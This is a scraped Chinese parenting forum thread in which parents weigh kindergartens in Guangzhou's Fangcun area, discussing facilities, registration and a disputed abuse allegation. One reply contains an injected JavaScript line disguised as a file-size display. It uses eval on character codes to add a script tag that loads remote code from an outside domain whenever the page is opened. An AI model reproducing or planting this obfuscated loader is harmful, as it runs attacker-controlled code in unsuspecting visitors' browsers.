帖子详情

芳村怡芳苑艺术幼儿园好吗?还是去花地幼儿园好啊?

1833127幼儿园早教

孩子今年8月要读幼儿园了,去读怡芳苑还是去花地幼好啊?有在读怡芳苑的宝妈吗?求赐教,急啊。幼儿园打来下星期得去注册了。读还是不读啊?
精选回帖
8楼
1970/01/01回复
mixiunamixiuna12楼
关键是宝宝现在在山东,她奶奶不想那么早来,说这边太热了,说就报个名,给老师看看照片,或者视频也行…………因为读的前期需要她帮忙带带,然后我再自己带,唉!过两天直接去幼儿园问一下吧,谢谢宝妈!
2017/03/07回复
$('ed2k_ULU').innerHTML=htmlspecialchars(unescape(decodeURIComponent('filesize')))+' ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+' Bytes)';还是选怡芳苑吧
2017/03/10回复
mixiunamixiuna20楼
我现在就是住合兴苑,所以在考虑到底是合兴苑还是花地,同事的宝宝在花地,她就说挺好的,教育为主,合兴苑我看了其他宝妈的评论,似乎不太好,纠结啊!
2017/05/03回复
全部回帖
靓靓华华哗:
孩子今年8月要读幼儿园了,去读怡芳苑还是去花地幼好啊?有在读怡芳苑的宝妈吗?求赐教,急啊。幼儿园打来下星期得去注册了。读还是不读啊?
查看原文
宝妈们给我点建议吧,到底这幼儿园好吗,选幼儿园选到想哭,心大心细,好凄凉啊。跪求答案啊
2016/05/17回复
rubykissrubykiss板凳
怡芳苑
靓靓华华哗:
查看原文
花地幼儿园我之前去看过,花地实在太差了,环境不好,园内活动范围不大,如果你要在这两家选一家,那肯定是怡芳苑的。
我宝快2岁半了。恒荔怡乐、合兴苑、怡芳苑、花地幼4间我都去睇过。入去睇完实地了解过后,合兴苑是第一间out的,因为小小班是唔上课坐在科室玩玩具,去了两次,两次都是这样。怡乐是这4间学费最贵的,老师比较年轻,课室不大,里面的装修其实也真的不怎么样。至于花地幼虽然细但是小小班每日早上都要上英语课,老师望落去都比较细心。怡芳苑上课期间是不准入去参观的,只能在放学入去望下,而且只能望1楼。唔清楚是点上课的,这就是我一直纠结去花地幼还是怡芳苑。我在同一日收到这两间幼儿园的收生通知。
2016/05/18回复
怡芳苑的口碑是不错,但是上年出了一单老师打学生的微博。闹到警察上门。所以心里还是有点担心。后续发展唔知答案。怡芳苑门口是挂住个学武术的牌。我听人讲里面D细路是要学武术的,如果是女仔就去读花地幼,学跳舞,成日参加比赛。至于学游水,我问过花地幼D老师,她们话每年夏天都是康有为小学会过来收D B仔过去学。
2016/05/18回复
请问楼主最后去了哪一家幼儿园?我也在考虑这几家
2016/12/09回复
今年9月份准备让囡囡在花地幼儿园读,打了学校电话,说报名那天也要带小朋友一块过去,有已经在那边读的吗?具体报名方式是怎么样的呀,因为听同事跟朋友,有的话要有的说不用,捉急啊,盼复!
2017/03/05回复
catkitcatkit9楼
mixiuna:
今年9月份准备让囡囡在花地幼儿园读,打了学校电话,说报名那天也要带小朋友一块过去,有已经在那边读的吗?具体报名方式是怎么样的呀,因为听同事跟朋友,有的话要有的说不用,捉急啊,盼复!
查看原文
我地旧年去既时候带埋小朋友去噶,其实就系望下小朋友,问几个号简单问题而已,五使紧张
2017/03/06回复
宝妈,我儿子一直在怡芳艺术幼儿园就读,那里的园长和老师都很好,对孩子很有爱心,对于宝妈说的打人事件,据我所知警察已经查清楚,是子虚乌有的事,也给幼儿园和那位老师还了清白,现在我的小儿子也想进去读书,但是园方说暂时还没有学位,先接受报名,还温馨提示我们要去其他幼儿园报名,免得耽误我们孩子的上学,期待5月份接到幼儿园的注册通知!
mixiunamixiuna11楼
catkit 发表于 2017-03-06 15:11
回复 mixiuna 的帖子

我地旧年去既时候带埋小朋友去噶,其实就系望下小朋友,问几个号简单问题而已,五使..
关键是宝宝现在在山东,她奶奶不想那么早来,说这边太热了,说就报个名,给老师看看照片,或者视频也行…………
因为读的前期需要她帮忙带带,然后我再自己带,唉!过两天直接去幼儿园问一下吧,谢谢宝妈!
catkit:
我地旧年去既时候带埋小朋友去噶,其实就系望下小朋友,问几个号简单问题而已,五使紧张
查看原文
我也去报名了  不清楚能不能接到5月份注册通知
2017/03/08回复
catkitcatkit13楼
蔚蓝国际:
我也去报名了  不清楚能不能接到5月份注册通知
查看原文
我去年5月份先去报名,都无问题,五使担心
翠竹苑里面有家叫什么怡幼儿园的,大家知道吗?里面怎么样

还是选怡芳苑吧
mixiunamixiuna16楼
靓靓华华哗 发表于 2016-05-18 11:38
我宝快2岁半了。恒荔怡乐、合兴苑、怡芳苑、花地幼4间我都去睇过。入去睇完实地了解过后,合兴苑是第一间ou..
亲,花地幼儿园的老师对小朋友们细心不?
2017/03/13回复
mixiuna:
查看原文
合兴苑前几天也去看了,户外场所确实很大,不过负责接待的是个类似大妈性质的人,没有一点老师的素养,拼命的忽悠我,让我们报小小班
2017/03/23回复
mixiuna:
查看原文
合兴苑前几天也去看了,户外场所确实很大,不过负责接待的是个类似大妈性质的人,没有一点老师的素养,拼命的忽悠我,让我们报小小班
2017/03/23回复
mixiunamixiuna19楼
蔚蓝国际 发表于 2017-03-23 08:48
回复 mixiuna 的帖子

合兴苑前几天也去看了,户外场所确实很大,不过负责接待的是个类似大妈性质的人,没..
我现在就是住合兴苑,所以在考虑到底是合兴苑还是花地,同事的宝宝在花地,她就说挺好的,教育为主,合兴苑我看了其他宝妈的评论,似乎不太好,纠结啊!
2017/05/03回复
猜你喜欢

有没有粤垦路附近,9月份读幼儿园的宝宝

越秀中大北校区幼儿园和天河侨怡幼儿园哪个好

越秀区学位旧房还是海珠区回迁新房?

请问入读黄埔怡蕾幼儿园一定要怡港花园的业主吗?

西关幼和比诺纠结读哪个好啊……

番禺东怡新区附近的幼儿园

热点推荐

突发!暴雨至卜蜂莲花超市天花渗漏

说走就走!三天两夜珍珠湾追逐蓝眼泪

达美乐披萨买一送一 真的一分钱一分货

打卡西朗市场探下菜价 便还是贵?

速速归队!广州妈妈网喊你回家啦

黑妖来了 600公里强飑线扫过广州

CityWalk巴黎人 仿法国宫廷好出片!

带娃感受儿童主题派对 可换装好酷炫

桂林南溪山睇樱花 落雨赏花好有意境

新开陈文鼎珍珠奶茶 开业大优惠

一人食谷饲肥牛烤肉片 经济实惠

广东道寻找熟悉老味道 老牌餐厅不踩雷

啫啫排骨煲升级版 加上海鲜无得顶

查看更多热点 >